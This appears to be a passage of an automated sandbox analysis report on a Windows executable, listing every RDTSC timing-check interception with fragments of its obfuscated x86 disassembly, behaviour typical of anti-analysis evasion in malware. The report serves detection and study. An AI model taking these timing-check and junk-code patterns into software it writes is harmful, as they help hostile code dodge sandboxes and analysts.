                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 370605 second address: 370609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 372495 second address: 3724B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29FC52457Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 ja 00007F29FC524576h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3724B5 second address: 3724BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371589 second address: 371651 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F29FC524585h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12452DD2h], ecx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movzx edi, ax 0x0000001e jp 00007F29FC524576h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F29FC524578h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 sub dword ptr [ebp+122D21F7h], ebx 0x0000004b mov eax, dword ptr [ebp+122D0209h] 0x00000051 push 00000000h 0x00000053 push esi 0x00000054 call 00007F29FC524578h 0x00000059 pop esi 0x0000005a mov dword ptr [esp+04h], esi 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc esi 0x00000067 push esi 0x00000068 ret 0x00000069 pop esi 0x0000006a ret 0x0000006b jmp 00007F29FC524582h 0x00000070 push FFFFFFFFh 0x00000072 jmp 00007F29FC524589h 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F29FC52457Fh 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 371651 second address: 37166B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F29FC6B5C96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37166B second address: 37166F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37353A second address: 37354F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC6B5C9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37354F second address: 373559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 372668 second address: 37266E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37266E second address: 372673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37445E second address: 374464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3736AE second address: 3736B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3736B3 second address: 3736B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3736B8 second address: 37376D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F29FC524578h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 jnl 00007F29FC52457Ch 0x0000002a push dword ptr fs:[00000000h] 0x00000031 jmp 00007F29FC524586h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d or dword ptr [ebp+122D1ED1h], esi 0x00000043 mov eax, dword ptr [ebp+122D021Dh] 0x00000049 jmp 00007F29FC524581h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebp 0x00000053 call 00007F29FC524578h 0x00000058 pop ebp 0x00000059 mov dword ptr [esp+04h], ebp 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc ebp 0x00000066 push ebp 0x00000067 ret 0x00000068 pop ebp 0x00000069 ret 0x0000006a mov edi, dword ptr [ebp+12480638h] 0x00000070 nop 0x00000071 push ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F29FC524585h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37376D second address: 373771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3754EE second address: 375537 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29FC524578h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F29FC524578h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov di, 0224h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c mov edi, dword ptr [ebp+1248087Ch] 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D35C1h] 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 375537 second address: 37554E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC6B5CA2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 37554E second address: 375554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 375554 second address: 375558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB272 second address: 3BB276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB276 second address: 3BB27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB27C second address: 3BB285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB3DC second address: 3BB42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F29FC6B5CA8h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jnp 00007F29FC6B5C96h 0x0000001c jng 00007F29FC6B5C96h 0x00000022 jo 00007F29FC6B5C96h 0x00000028 popad 0x00000029 push ecx 0x0000002a jmp 00007F29FC6B5CA4h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB58C second address: 3BB592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB592 second address: 3BB596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB596 second address: 3BB59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB59A second address: 3BB5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F29FC6B5CA1h 0x0000000c jng 00007F29FC6B5C96h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F29FC6B5CAFh 0x0000001d jmp 00007F29FC6B5CA3h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB5D8 second address: 3BB5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB5E0 second address: 3BB5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3BB5E4 second address: 3BB5EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C21FB second address: 3C2209 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2360 second address: 3C2366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2366 second address: 3C236A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C236A second address: 3C2378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2378 second address: 3C238A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F29FC6B5C96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C238A second address: 3C2390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C24CE second address: 3C24D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C24D3 second address: 3C24D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366FAF second address: 366FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366FB5 second address: 366FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F29FC524576h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 366FC2 second address: 367029 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29FC6B5C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F29FC6B5C98h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 sub dx, 4DB8h 0x0000002b mov edx, dword ptr [ebp+122D200Fh] 0x00000031 push 00000004h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F29FC6B5C98h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 367029 second address: 36702E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C287A second address: 3C2889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 je 00007F29FC6B5C96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C2889 second address: 3C288D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C288D second address: 3C2893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C3447 second address: 3C344C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C344C second address: 3C3452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C3452 second address: 3C349E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29FC524576h 0x0000000a popad 0x0000000b jc 00007F29FC52457Ah 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jmp 00007F29FC52457Dh 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 ja 00007F29FC524576h 0x00000026 pop edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29FC524585h 0x0000002e je 00007F29FC524576h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C349E second address: 3C34A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C34A9 second address: 3C34AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CAB3C second address: 3CAB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C8B77 second address: 3C8BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524584h 0x00000007 jo 00007F29FC524576h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 jl 00007F29FC524586h 0x0000001b jmp 00007F29FC52457Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C8BAD second address: 3C8BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F29FC6B5C9Dh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jne 00007F29FC6B5C9Ch 0x00000017 jg 00007F29FC6B5C96h 0x0000001d push ebx 0x0000001e jmp 00007F29FC6B5C9Dh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C8FFE second address: 3C902F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29FC524585h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C902F second address: 3C9033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9033 second address: 3C905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC524582h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C95A0 second address: 3C95A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C95A6 second address: 3C95AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C95AA second address: 3C95B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F29FC6B5C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9906 second address: 3C991F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jne 00007F29FC524576h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9B97 second address: 3C9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F29FC6B5C96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9EE6 second address: 3C9EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29FC524576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9EF0 second address: 3C9F00 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29FC6B5C96h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3C9F00 second address: 3C9F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA525 second address: 3CA536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007F29FC6B5C96h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA536 second address: 3CA53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA81D second address: 3CA821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA821 second address: 3CA827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA827 second address: 3CA82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA82D second address: 3CA84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F29FC524576h 0x0000000a jmp 00007F29FC524583h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CA84A second address: 3CA869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29FC6B5CA3h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CEC76 second address: 3CEC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F29FC524583h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CEC8E second address: 3CEC98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F29FC6B5C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF03E second address: 3CF050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F29FC52457Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF050 second address: 3CF054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF054 second address: 3CF060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29FC524576h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF060 second address: 3CF06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1C4 second address: 3CF1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F29FC524576h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1D2 second address: 3CF1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1D8 second address: 3CF1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1DD second address: 3CF1E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1E2 second address: 3CF1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29FC524576h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1EE second address: 3CF1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 3CF1F4 second address: 3CF229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29FC524583h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29FC524588h 0x00000014 rdtsc
